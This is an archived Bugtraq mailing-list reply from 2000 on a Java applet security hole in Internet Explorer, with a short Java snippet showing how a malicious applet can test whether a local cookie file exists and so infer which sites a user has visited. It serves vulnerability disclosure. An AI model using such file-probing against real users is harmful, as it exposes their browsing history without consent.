[16369] in bugtraq
Re: BrownOrifice can break firewalls! NOW MSIE
daemon@ATHENA.MIT.EDU (TAKAGI, Hiromitsu)
Thu Aug 24 01:06:43 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Message-Id: <20000824082415.36BC.TAKAGI@etl.go.jp>
Date: Thu, 24 Aug 2000 09:35:51 +0900
Reply-To: "TAKAGI, Hiromitsu" <takagi@ETL.GO.JP>
From: "TAKAGI, Hiromitsu" <takagi@ETL.GO.JP>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <399F8F0F.ADF65EFB@oltres.com>
On Sun, 20 Aug 2000 10:55:59 +0300
Alexey Yarovinsky <ayarovin@OLTRES.COM> wrote:
> The same security hole, exists in MSIE too, with one restriction: url can't
> start with file:. But still the applet from outside site, can access you
> intranet servers including ftps and ALL sites you have access to. The
> demonstration of the bug is here:
> http://www.oltres.com/ms-bug/
"file:" url can be used to exploit. Malicious applet certainly cannot
read content of files, but it can determine whether the specified
file exists or not.
try {
new WURLConnection("file:/C:/WINDOWS/Cookies/default@playboy[1].txt");
} catch (SecurityException e) {
System.out.println("You have visited the Playboy site.");
} catch (java.io.FileNotFoundException e) {
System.out.println("You may not have visited the Playboy site.");
}
Regards,
--
Hiromitsu Takagi
Electrotechnical Laboratory
http://www.etl.go.jp/~takagi/
